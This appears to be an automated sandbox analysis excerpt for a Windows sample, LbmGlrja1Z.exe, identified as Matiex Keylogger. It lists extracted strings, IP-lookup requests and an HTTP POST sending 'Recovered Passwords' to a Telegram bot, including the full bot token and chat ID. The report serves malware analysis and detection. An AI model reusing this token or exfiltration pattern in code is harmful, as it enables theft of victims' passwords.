                          Source: unknownNetwork traffic detected: HTTP traffic on port 50345 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50660 -> 443
                          Source: LbmGlrja1Z.exe, 00000000.00000003.367490621.00000000069A0000.00000004.00000001.sdmpString found in binary or memory: http://checkip.dyndns.org/
                          Source: LbmGlrja1Z.exe, 00000000.00000003.367490621.00000000069A0000.00000004.00000001.sdmpString found in binary or memory: http://checkip.dyndns.org/t
                          Source: LbmGlrja1Z.exe, 00000000.00000003.435108634.0000000003861000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram
                          Source: LbmGlrja1Z.exe, 00000000.00000003.435568732.0000000003AA5000.00000004.00000001.sdmp, LbmGlrja1Z.exe, 00000000.00000003.435410916.00000000039FF000.00000004.00000001.sdmp, LbmGlrja1Z.exe, 00000000.00000003.435072840.000000000383F000.00000004.00000001.sdmp, LbmGlrja1Z.exe, 00000000.00000003.466890920.0000000007BFD000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639
                          Source: LbmGlrja1Z.exe, 00000000.00000003.435568732.0000000003AA5000.00000004.00000001.sdmpString found in binary or memory: https://www.geodatatool.com/en/?ip=102.129.143.33
                          Source: unknownHTTP traffic detected: POST /bot2024219567:AAGgykIaN65yZpDtrTgB9E6sZsAPRCpMym8/sendDocument?chat_id=1639898258&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Passwords%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98d87cff36e4bHost: api.telegram.orgContent-Length: 840Connection: Keep-Alive
                          Source: unknownDNS traffic detected: queries for: checkip.dyndns.org
                          Source: global trafficHTTP traffic detected: GET /xml/102.129.143.33 HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /xml/102.129.143.33 HTTP/1.1Host: freegeoip.app
                          Source: global trafficHTTP traffic detected: GET /xml/102.129.143.33 HTTP/1.1Host: freegeoip.app
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49756 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49857 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49934 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:50605 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:50848 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:51023 version: TLS 1.2
                          Source: LbmGlrja1Z.exe, 00000000.00000002.702655586.0000000001460000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>